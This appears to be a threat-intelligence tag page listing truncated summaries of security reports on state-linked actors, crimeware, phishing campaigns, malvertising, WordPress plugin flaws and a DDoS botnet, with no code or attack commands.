Insikt Group tracks BlueCharlie, a Russia-nexus threat group that’s evolving operations, with 94 new domains since March 2023.
Tag: THREAT INTELLIGENCE
Three crimeware families—DarkGate, LokiBot, and Emotet—are described with their infection chains and capabilities, including a four-stage DarkGate loader, a LokiBot phishing campaign, and an Emotet resurgence via OneNote attachments. The report highlights memo…
Microsoft Threat Intelligence has identified highly targeted social engineering attacks using credential theft phishing lures sent as Microsoft Teams chats by the threat actor that Microsoft tracks as Midnight Blizzard (previously tracked as NOBELIUM). This la…
For the past few years, hackers have increasingly targeted customers and
businesses with tainted software boosted via ads. The recipe is simple –
cyber-criminal groups set up fake websites for high-interest software and
promote them on top of the results page through advertisements.
It takes just one search and one click for a user to fall victim to the trick.
Testament to that is the series of attacks against prominent crypto-currency
figures earlier in 2023 as well as a recent spate of incid
Microsoft details cloud cryptojacking as cloud compute resource abuse within compromised tenants, leading to substantial compute fees (over $300,000 observed). The post outlines attacker lifecycle, GPU-focused deployment, and defender strategies using Microsof…
Vade’s Threat Intelligence and Response Center (TIRC) detected a new Microsoft 365 phishing campaign delivered via a malicious HTML attachment that loads a fake authentication form hosted on glitch.me. The operation uses base64-encoded payloads, JavaScript in …
Wordfence Threat Intelligence tracked a targeted exploit campaign against WooCommerce Payments CVE-2023-28121, which allowed unauthenticated attackers to obtain administrative privileges on vulnerable sites. The attackers used a multi-stage workflow including …
Cadet Blizzard is a distinct Russian GRU-sponsored threat actor elevated from DEV-0586, known for destructive and disruptive operations in Ukraine and Europe, including web defacements, WhisperGate, and a hack-and-leak front called Free Civilian. Microsoft Thr…
Microsoft Threat Intelligence ties a destructive operation to MERCURY (also known as Mango Sandstorm) and to DEV-1084 (Storm-1084), detailing how they compromised hybrid on-premises and cloud environments and pursued irreversible disruption rather than ransom.…
Microsoft Threat Intelligence tracks DEV-1101 (now Storm-1101) for developing and promoting an open-source AiTM phishing kit that enables high-volume campaigns and MFA bypass via reverse-proxy session hijacking. The post details the tool, its campaign workflow…
Brute Ratel, a Red Team framework, has been abused by attackers including APT29 to conduct cyber intrusions, with methods such as ISO-delivered LNK files used for DLL sideloading of version.dll. The article also details the framework’s technical underpinnings,…
HUMAN’s Satori Threat Intelligence and Research Team dismantled a sophisticated malvertising operation named VASTFLUX that injected JavaScript into ad creatives to stack multiple video players behind a single banner and fraudulently register views. The operati…
Wordfence Threat Intelligence tracked a critical Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium (versions
Cyble researchers examined a fraud operation where impostors posing as Village Level Entrepreneurs duped CSC Bank Mitra subscribers through a counterfeit CSC registration portal and staged KYC-like interactions. The scheme leveraged fake website ecscgov.co.in,…
MCCrash is a cross‑platform DDoS botnet tracked by Microsoft Threat Intelligence that targets Windows, Linux, and IoT devices to attack private Minecraft servers. It propagates via SSH credential brute‑forcing, downloads multi‑stage components, and issues Mine…